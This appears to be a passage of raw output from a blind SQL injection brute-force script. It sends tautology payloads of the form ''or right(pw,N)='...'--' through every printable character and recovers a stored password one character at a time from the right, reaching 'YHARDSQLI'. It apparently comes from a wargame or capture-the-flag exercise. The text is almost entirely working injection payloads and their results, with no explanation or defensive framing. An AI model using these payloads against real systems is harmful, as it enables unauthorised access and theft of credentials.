column : 2
query : 'or right(pw,2)=' I'--
query : 'or right(pw,2)='!I'--
query : 'or right(pw,2)='"I'--
query : 'or right(pw,2)='#I'--
query : 'or right(pw,2)='$I'--
query : 'or right(pw,2)='%I'--
query : 'or right(pw,2)='&I'--
query : 'or right(pw,2)=''I'--
query : 'or right(pw,2)='(I'--
query : 'or right(pw,2)=')I'--
query : 'or right(pw,2)='*I'--
query : 'or right(pw,2)='+I'--
query : 'or right(pw,2)=',I'--
query : 'or right(pw,2)='-I'--
query : 'or right(pw,2)='.I'--
query : 'or right(pw,2)='/I'--
query : 'or right(pw,2)='0I'--
query : 'or right(pw,2)='1I'--
query : 'or right(pw,2)='2I'--
query : 'or right(pw,2)='3I'--
query : 'or right(pw,2)='4I'--
query : 'or right(pw,2)='5I'--
query : 'or right(pw,2)='6I'--
query : 'or right(pw,2)='7I'--
query : 'or right(pw,2)='8I'--
query : 'or right(pw,2)='9I'--
query : 'or right(pw,2)=':I'--
query : 'or right(pw,2)=';I'--
query : 'or right(pw,2)='<I'--
query : 'or right(pw,2)='=I'--
query : 'or right(pw,2)='>I'--
query : 'or right(pw,2)='?I'--
query : 'or right(pw,2)='@I'--
query : 'or right(pw,2)='AI'--
query : 'or right(pw,2)='BI'--
query : 'or right(pw,2)='CI'--
query : 'or right(pw,2)='DI'--
query : 'or right(pw,2)='EI'--
query : 'or right(pw,2)='FI'--
query : 'or right(pw,2)='GI'--
query : 'or right(pw,2)='HI'--
query : 'or right(pw,2)='II'--
query : 'or right(pw,2)='JI'--
query : 'or right(pw,2)='KI'--
query : 'or right(pw,2)='LI'--
password : LI
column : 3
query : 'or right(pw,3)=' LI'--
query : 'or right(pw,3)='!LI'--
query : 'or right(pw,3)='"LI'--
query : 'or right(pw,3)='#LI'--
query : 'or right(pw,3)='$LI'--
query : 'or right(pw,3)='%LI'--
query : 'or right(pw,3)='&LI'--
query : 'or right(pw,3)=''LI'--
query : 'or right(pw,3)='(LI'--
query : 'or right(pw,3)=')LI'--
query : 'or right(pw,3)='*LI'--
query : 'or right(pw,3)='+LI'--
query : 'or right(pw,3)=',LI'--
query : 'or right(pw,3)='-LI'--
query : 'or right(pw,3)='.LI'--
query : 'or right(pw,3)='/LI'--
query : 'or right(pw,3)='0LI'--
query : 'or right(pw,3)='1LI'--
query : 'or right(pw,3)='2LI'--
query : 'or right(pw,3)='3LI'--
query : 'or right(pw,3)='4LI'--
query : 'or right(pw,3)='5LI'--
query : 'or right(pw,3)='6LI'--
query : 'or right(pw,3)='7LI'--
query : 'or right(pw,3)='8LI'--
query : 'or right(pw,3)='9LI'--
query : 'or right(pw,3)=':LI'--
query : 'or right(pw,3)=';LI'--
query : 'or right(pw,3)='<LI'--
query : 'or right(pw,3)='=LI'--
query : 'or right(pw,3)='>LI'--
query : 'or right(pw,3)='?LI'--
query : 'or right(pw,3)='@LI'--
query : 'or right(pw,3)='ALI'--
query : 'or right(pw,3)='BLI'--
query : 'or right(pw,3)='CLI'--
query : 'or right(pw,3)='DLI'--
query : 'or right(pw,3)='ELI'--
query : 'or right(pw,3)='FLI'--
query : 'or right(pw,3)='GLI'--
query : 'or right(pw,3)='HLI'--
query : 'or right(pw,3)='ILI'--
query : 'or right(pw,3)='JLI'--
query : 'or right(pw,3)='KLI'--
query : 'or right(pw,3)='LLI'--
query : 'or right(pw,3)='MLI'--
query : 'or right(pw,3)='NLI'--
query : 'or right(pw,3)='OLI'--
query : 'or right(pw,3)='PLI'--
query : 'or right(pw,3)='QLI'--
password : QLI
column : 4
query : 'or right(pw,4)=' QLI'--
query : 'or right(pw,4)='!QLI'--
query : 'or right(pw,4)='"QLI'--
query : 'or right(pw,4)='#QLI'--
query : 'or right(pw,4)='$QLI'--
query : 'or right(pw,4)='%QLI'--
query : 'or right(pw,4)='&QLI'--
query : 'or right(pw,4)=''QLI'--
query : 'or right(pw,4)='(QLI'--
query : 'or right(pw,4)=')QLI'--
query : 'or right(pw,4)='*QLI'--
query : 'or right(pw,4)='+QLI'--
query : 'or right(pw,4)=',QLI'--
query : 'or right(pw,4)='-QLI'--
query : 'or right(pw,4)='.QLI'--
query : 'or right(pw,4)='/QLI'--
query : 'or right(pw,4)='0QLI'--
query : 'or right(pw,4)='1QLI'--
query : 'or right(pw,4)='2QLI'--
query : 'or right(pw,4)='3QLI'--
query : 'or right(pw,4)='4QLI'--
query : 'or right(pw,4)='5QLI'--
query : 'or right(pw,4)='6QLI'--
query : 'or right(pw,4)='7QLI'--
query : 'or right(pw,4)='8QLI'--
query : 'or right(pw,4)='9QLI'--
query : 'or right(pw,4)=':QLI'--
query : 'or right(pw,4)=';QLI'--
query : 'or right(pw,4)='<QLI'--
query : 'or right(pw,4)='=QLI'--
query : 'or right(pw,4)='>QLI'--
query : 'or right(pw,4)='?QLI'--
query : 'or right(pw,4)='@QLI'--
query : 'or right(pw,4)='AQLI'--
query : 'or right(pw,4)='BQLI'--
query : 'or right(pw,4)='CQLI'--
query : 'or right(pw,4)='DQLI'--
query : 'or right(pw,4)='EQLI'--
query : 'or right(pw,4)='FQLI'--
query : 'or right(pw,4)='GQLI'--
query : 'or right(pw,4)='HQLI'--
query : 'or right(pw,4)='IQLI'--
query : 'or right(pw,4)='JQLI'--
query : 'or right(pw,4)='KQLI'--
query : 'or right(pw,4)='LQLI'--
query : 'or right(pw,4)='MQLI'--
query : 'or right(pw,4)='NQLI'--
query : 'or right(pw,4)='OQLI'--
query : 'or right(pw,4)='PQLI'--
query : 'or right(pw,4)='QQLI'--
query : 'or right(pw,4)='RQLI'--
query : 'or right(pw,4)='SQLI'--
password : SQLI
column : 5
query : 'or right(pw,5)=' SQLI'--
query : 'or right(pw,5)='!SQLI'--
query : 'or right(pw,5)='"SQLI'--
query : 'or right(pw,5)='#SQLI'--
query : 'or right(pw,5)='$SQLI'--
query : 'or right(pw,5)='%SQLI'--
query : 'or right(pw,5)='&SQLI'--
query : 'or right(pw,5)=''SQLI'--
query : 'or right(pw,5)='(SQLI'--
query : 'or right(pw,5)=')SQLI'--
query : 'or right(pw,5)='*SQLI'--
query : 'or right(pw,5)='+SQLI'--
query : 'or right(pw,5)=',SQLI'--
query : 'or right(pw,5)='-SQLI'--
query : 'or right(pw,5)='.SQLI'--
query : 'or right(pw,5)='/SQLI'--
query : 'or right(pw,5)='0SQLI'--
query : 'or right(pw,5)='1SQLI'--
query : 'or right(pw,5)='2SQLI'--
query : 'or right(pw,5)='3SQLI'--
query : 'or right(pw,5)='4SQLI'--
query : 'or right(pw,5)='5SQLI'--
query : 'or right(pw,5)='6SQLI'--
query : 'or right(pw,5)='7SQLI'--
query : 'or right(pw,5)='8SQLI'--
query : 'or right(pw,5)='9SQLI'--
query : 'or right(pw,5)=':SQLI'--
query : 'or right(pw,5)=';SQLI'--
query : 'or right(pw,5)='<SQLI'--
query : 'or right(pw,5)='=SQLI'--
query : 'or right(pw,5)='>SQLI'--
query : 'or right(pw,5)='?SQLI'--
query : 'or right(pw,5)='@SQLI'--
query : 'or right(pw,5)='ASQLI'--
query : 'or right(pw,5)='BSQLI'--
query : 'or right(pw,5)='CSQLI'--
query : 'or right(pw,5)='DSQLI'--
password : DSQLI
column : 6
query : 'or right(pw,6)=' DSQLI'--
query : 'or right(pw,6)='!DSQLI'--
query : 'or right(pw,6)='"DSQLI'--
query : 'or right(pw,6)='#DSQLI'--
query : 'or right(pw,6)='$DSQLI'--
query : 'or right(pw,6)='%DSQLI'--
query : 'or right(pw,6)='&DSQLI'--
query : 'or right(pw,6)=''DSQLI'--
query : 'or right(pw,6)='(DSQLI'--
query : 'or right(pw,6)=')DSQLI'--
query : 'or right(pw,6)='*DSQLI'--
query : 'or right(pw,6)='+DSQLI'--
query : 'or right(pw,6)=',DSQLI'--
query : 'or right(pw,6)='-DSQLI'--
query : 'or right(pw,6)='.DSQLI'--
query : 'or right(pw,6)='/DSQLI'--
query : 'or right(pw,6)='0DSQLI'--
query : 'or right(pw,6)='1DSQLI'--
query : 'or right(pw,6)='2DSQLI'--
query : 'or right(pw,6)='3DSQLI'--
query : 'or right(pw,6)='4DSQLI'--
query : 'or right(pw,6)='5DSQLI'--
query : 'or right(pw,6)='6DSQLI'--
query : 'or right(pw,6)='7DSQLI'--
query : 'or right(pw,6)='8DSQLI'--
query : 'or right(pw,6)='9DSQLI'--
query : 'or right(pw,6)=':DSQLI'--
query : 'or right(pw,6)=';DSQLI'--
query : 'or right(pw,6)='<DSQLI'--
query : 'or right(pw,6)='=DSQLI'--
query : 'or right(pw,6)='>DSQLI'--
query : 'or right(pw,6)='?DSQLI'--
query : 'or right(pw,6)='@DSQLI'--
query : 'or right(pw,6)='ADSQLI'--
query : 'or right(pw,6)='BDSQLI'--
query : 'or right(pw,6)='CDSQLI'--
query : 'or right(pw,6)='DDSQLI'--
query : 'or right(pw,6)='EDSQLI'--
query : 'or right(pw,6)='FDSQLI'--
query : 'or right(pw,6)='GDSQLI'--
query : 'or right(pw,6)='HDSQLI'--
query : 'or right(pw,6)='IDSQLI'--
query : 'or right(pw,6)='JDSQLI'--
query : 'or right(pw,6)='KDSQLI'--
query : 'or right(pw,6)='LDSQLI'--
query : 'or right(pw,6)='MDSQLI'--
query : 'or right(pw,6)='NDSQLI'--
query : 'or right(pw,6)='ODSQLI'--
query : 'or right(pw,6)='PDSQLI'--
query : 'or right(pw,6)='QDSQLI'--
query : 'or right(pw,6)='RDSQLI'--
password : RDSQLI
column : 7
query : 'or right(pw,7)=' RDSQLI'--
query : 'or right(pw,7)='!RDSQLI'--
query : 'or right(pw,7)='"RDSQLI'--
query : 'or right(pw,7)='#RDSQLI'--
query : 'or right(pw,7)='$RDSQLI'--
query : 'or right(pw,7)='%RDSQLI'--
query : 'or right(pw,7)='&RDSQLI'--
query : 'or right(pw,7)=''RDSQLI'--
query : 'or right(pw,7)='(RDSQLI'--
query : 'or right(pw,7)=')RDSQLI'--
query : 'or right(pw,7)='*RDSQLI'--
query : 'or right(pw,7)='+RDSQLI'--
query : 'or right(pw,7)=',RDSQLI'--
query : 'or right(pw,7)='-RDSQLI'--
query : 'or right(pw,7)='.RDSQLI'--
query : 'or right(pw,7)='/RDSQLI'--
query : 'or right(pw,7)='0RDSQLI'--
query : 'or right(pw,7)='1RDSQLI'--
query : 'or right(pw,7)='2RDSQLI'--
query : 'or right(pw,7)='3RDSQLI'--
query : 'or right(pw,7)='4RDSQLI'--
query : 'or right(pw,7)='5RDSQLI'--
query : 'or right(pw,7)='6RDSQLI'--
query : 'or right(pw,7)='7RDSQLI'--
query : 'or right(pw,7)='8RDSQLI'--
query : 'or right(pw,7)='9RDSQLI'--
query : 'or right(pw,7)=':RDSQLI'--
query : 'or right(pw,7)=';RDSQLI'--
query : 'or right(pw,7)='<RDSQLI'--
query : 'or right(pw,7)='=RDSQLI'--
query : 'or right(pw,7)='>RDSQLI'--
query : 'or right(pw,7)='?RDSQLI'--
query : 'or right(pw,7)='@RDSQLI'--
query : 'or right(pw,7)='ARDSQLI'--
password : ARDSQLI
column : 8
query : 'or right(pw,8)=' ARDSQLI'--
query : 'or right(pw,8)='!ARDSQLI'--
query : 'or right(pw,8)='"ARDSQLI'--
query : 'or right(pw,8)='#ARDSQLI'--
query : 'or right(pw,8)='$ARDSQLI'--
query : 'or right(pw,8)='%ARDSQLI'--
query : 'or right(pw,8)='&ARDSQLI'--
query : 'or right(pw,8)=''ARDSQLI'--
query : 'or right(pw,8)='(ARDSQLI'--
query : 'or right(pw,8)=')ARDSQLI'--
query : 'or right(pw,8)='*ARDSQLI'--
query : 'or right(pw,8)='+ARDSQLI'--
query : 'or right(pw,8)=',ARDSQLI'--
query : 'or right(pw,8)='-ARDSQLI'--
query : 'or right(pw,8)='.ARDSQLI'--
query : 'or right(pw,8)='/ARDSQLI'--
query : 'or right(pw,8)='0ARDSQLI'--
query : 'or right(pw,8)='1ARDSQLI'--
query : 'or right(pw,8)='2ARDSQLI'--
query : 'or right(pw,8)='3ARDSQLI'--
query : 'or right(pw,8)='4ARDSQLI'--
query : 'or right(pw,8)='5ARDSQLI'--
query : 'or right(pw,8)='6ARDSQLI'--
query : 'or right(pw,8)='7ARDSQLI'--
query : 'or right(pw,8)='8ARDSQLI'--
query : 'or right(pw,8)='9ARDSQLI'--
query : 'or right(pw,8)=':ARDSQLI'--
query : 'or right(pw,8)=';ARDSQLI'--
query : 'or right(pw,8)='<ARDSQLI'--
query : 'or right(pw,8)='=ARDSQLI'--
query : 'or right(pw,8)='>ARDSQLI'--
query : 'or right(pw,8)='?ARDSQLI'--
query : 'or right(pw,8)='@ARDSQLI'--
query : 'or right(pw,8)='AARDSQLI'--
query : 'or right(pw,8)='BARDSQLI'--
query : 'or right(pw,8)='CARDSQLI'--
query : 'or right(pw,8)='DARDSQLI'--
query : 'or right(pw,8)='EARDSQLI'--
query : 'or right(pw,8)='FARDSQLI'--
query : 'or right(pw,8)='GARDSQLI'--
query : 'or right(pw,8)='HARDSQLI'--
password : HARDSQLI
column : 9
query : 'or right(pw,9)=' HARDSQLI'--
query : 'or right(pw,9)='!HARDSQLI'--
query : 'or right(pw,9)='"HARDSQLI'--
query : 'or right(pw,9)='#HARDSQLI'--
query : 'or right(pw,9)='$HARDSQLI'--
query : 'or right(pw,9)='%HARDSQLI'--
query : 'or right(pw,9)='&HARDSQLI'--
query : 'or right(pw,9)=''HARDSQLI'--
query : 'or right(pw,9)='(HARDSQLI'--
query : 'or right(pw,9)=')HARDSQLI'--
query : 'or right(pw,9)='*HARDSQLI'--
query : 'or right(pw,9)='+HARDSQLI'--
query : 'or right(pw,9)=',HARDSQLI'--
query : 'or right(pw,9)='-HARDSQLI'--
query : 'or right(pw,9)='.HARDSQLI'--
query : 'or right(pw,9)='/HARDSQLI'--
query : 'or right(pw,9)='0HARDSQLI'--
query : 'or right(pw,9)='1HARDSQLI'--
query : 'or right(pw,9)='2HARDSQLI'--
query : 'or right(pw,9)='3HARDSQLI'--
query : 'or right(pw,9)='4HARDSQLI'--
query : 'or right(pw,9)='5HARDSQLI'--
query : 'or right(pw,9)='6HARDSQLI'--
query : 'or right(pw,9)='7HARDSQLI'--
query : 'or right(pw,9)='8HARDSQLI'--
query : 'or right(pw,9)='9HARDSQLI'--
query : 'or right(pw,9)=':HARDSQLI'--
query : 'or right(pw,9)=';HARDSQLI'--
query : 'or right(pw,9)='<HARDSQLI'--
query : 'or right(pw,9)='=HARDSQLI'--
query : 'or right(pw,9)='>HARDSQLI'--
query : 'or right(pw,9)='?HARDSQLI'--
query : 'or right(pw,9)='@HARDSQLI'--
query : 'or right(pw,9)='AHARDSQLI'--
query : 'or right(pw,9)='BHARDSQLI'--
query : 'or right(pw,9)='CHARDSQLI'--
query : 'or right(pw,9)='DHARDSQLI'--
query : 'or right(pw,9)='EHARDSQLI'--
query : 'or right(pw,9)='FHARDSQLI'--
query : 'or right(pw,9)='GHARDSQLI'--
query : 'or right(pw,9)='HHARDSQLI'--
query : 'or right(pw,9)='IHARDSQLI'--
query : 'or right(pw,9)='JHARDSQLI'--
query : 'or right(pw,9)='KHARDSQLI'--
query : 'or right(pw,9)='LHARDSQLI'--
query : 'or right(pw,9)='MHARDSQLI'--
query : 'or right(pw,9)='NHARDSQLI'--
query : 'or right(pw,9)='OHARDSQLI'--
query : 'or right(pw,9)='PHARDSQLI'--
query : 'or right(pw,9)='QHARDSQLI'--
query : 'or right(pw,9)='RHARDSQLI'--
query : 'or right(pw,9)='SHARDSQLI'--
query : 'or right(pw,9)='THARDSQLI'--
query : 'or right(pw,9)='UHARDSQLI'--
query : 'or right(pw,9)='VHARDSQLI'--
query : 'or right(pw,9)='WHARDSQLI'--
query : 'or right(pw,9)='XHARDSQLI'--
query : 'or right(pw,9)='YHARDSQLI'--
password : YHARDSQLI
column : 10
query : 'or right(pw,10)=' YHARDSQLI'--
query : 'or right(pw,10)='!YHARDSQLI'--
query : 'or right(pw,10)='"YHARDSQLI'--
query : 'or right(pw,10)='#YHARDSQLI'--
query : 'or right(pw,10)='$YHARDSQLI'--
query : 'or right(pw,10)='%YHARDSQLI'--
query : 'or right(pw,10)='&YHARDSQLI'--
query : 'or right(pw,10)=''YHARDSQLI'--
query : 'or right(pw,10)='(YHARDSQLI'--
query : 'or right(pw,10)=')YHARDSQLI'--
query : 'or right(pw,10)='*YHARDSQLI'--
query : 'or right(pw,10)='+YHARDSQLI'--
query : 'or right(pw,10)=',YHARDSQLI'--
query : 'or right(pw,10)='-YHARDSQLI'--
query : 'or right(pw,10)='.YHARDSQLI'--
query : 'or right(pw,10)='/YHARDSQLI'--
query : 'or right(pw,10)='0YHARDSQLI'--
query : 'or right(pw,10)='1YHARDSQLI'--
query : 'or right(pw,10)='2YHARDSQLI'--
query : 'or right(pw,10)='3YHARDSQLI'--
query : 'or right(pw,10)='4YHARDSQLI'--
query : 'or right(pw,10)='5YHARDSQLI'--
query : 'or right(pw,10)='6YHARDSQLI'--
query : 'or right(pw,10)='7YHARDSQLI'--
query : 'or right(pw,10)='8YHARDSQLI'--
query : 'or right(pw,10)='9YHARDSQLI'--
query : 'or right(pw,10)=':YHARDSQLI'--
query : 'or right(pw,10)=';YHARDSQLI'--
query : 'or right(pw,10)='<YHARDSQLI'--
query : 'or right(pw,10)='=YHARDSQLI'--
query : 'or right(pw,10)='>YHARDSQLI'--
query : 'or right(pw,10)='?YHARDSQLI'--
query : 'or right(pw,10)='@YHARDSQLI'--
query : 'or right(pw,10)='AYHARDSQLI'--
query : 'or right(pw,10)='BYHARDSQLI'--
query : 'or right(pw,10)='CYHARDSQLI'--
query : 'or right(pw,10)='DYHARDSQLI'--
query : 'or right(pw,10)='EYHARDSQLI'--
query : 'or right(pw,10)='FYHARDSQLI'--
query : 'or right(pw,10)='GYHARDSQLI'--
query : 'or right(pw,10)='HYHARDSQLI'--
query : 'or right(pw,10)='IYHARDSQLI'--
query : 'or right(pw,10)='JYHARDSQLI'--
query : 'or right(pw,10)='KYHARDSQLI'--
query : 'or right(pw,10)='LYHARDSQLI'--
query : 'or right(pw,10)='MYHARDSQLI'--
query : 'or right(pw,10)='NYHARDSQLI'--
query : 'or right(pw,10)='OYHARDSQLI'--
query : 'or right(pw,10)='PYHARDSQLI'--
query : 'or right(pw,10)='QYHARDSQLI'--
query : 'or right(pw,10)='RYHARDSQLI'--
query : 'or right(pw,10)='SYHARDSQLI'--
query : 'or right(pw,10)='TYHARDSQLI'--
query : 'or right(pw,10)='UYHARDSQLI'--
query : 'or right(pw,10)='VYHARDSQLI'--
query : 'or right(pw,10)='WYHARDSQLI'--
query : 'or right(pw,10)='XYHARDSQLI'--
query : 'or right(pw,10)='YYHARDSQLI'--
query : 'or right(pw,10)='ZYHARDSQLI'--
query : 'or right(pw,10)='[YHARDSQLI'--
query : 'or right(pw,10)='\YHARDSQLI'--
query : 'or right(pw,10)=']YHARDSQLI'--
query : 'or right(pw,10)='^YHARDSQLI'--
query : 'or right(pw,10)='_YHARDSQLI'--
query : 'or right(pw,10)='`YHARDSQLI'--
query : 'or right(pw,10)='aYHARDSQLI'--
query : 'or right(pw,10)='bYHARDSQLI'--
query : 'or right(pw,10)='cYHARDSQLI'--
query : 'or right(pw,10)='dYHARDSQLI'--
query : 'or right(pw,10)='eYHARDSQLI'--
query : 'or right(pw,10)='fYHARDSQLI'--
query : 'or right(pw,10)='gYHARDSQLI'--
query : 'or right(pw,10)='hYHARDSQLI'--
query : 'or right(pw,10)='iYHARDSQLI'--
query : 'or right(pw,10)='jYHARDSQLI'--
query : 'or right(pw,10)='kYHARDSQLI'--
query : 'or right(pw,10)='lYHARDSQLI'--
query : 'or right(pw,10)='mYHARDSQLI'--
query : 'or right(pw,10)='nYHARDSQLI'--
query : 'or right(pw,10)='oYHARDSQLI'--
query : 'or right(pw,10)='pYHARDSQLI'--
query : 'or right(pw,10)='qYHARDSQLI'--
query : 'or right(pw,10)='rYHARDSQLI'--
query : 'or right(pw,10)='sYHARDSQLI'--
query : 'or right(pw,10)='tYHARDSQLI'--
query : 'or right(pw,10)='uYHARDSQLI'--
query : 'or right(pw,10)='vYHARDSQLI'--
query : 'or right(pw,10)='wYHARDSQLI'--
query : 'or right(pw,10)='xYHARDSQLI'--
query : 'or right(pw,10)='yYHARDSQLI'--
query : 'or right(pw,10)='zYHARDSQLI'--
query : 'or right(pw,10)='{YHARDSQLI'--
query : 'or right(pw,10)='|YHARDSQLI'--
query : 'or right(pw,10)='}YHARDSQLI'--
query : 'or right(pw,10)='~YHARDSQLI'--
password : YHARDSQLI
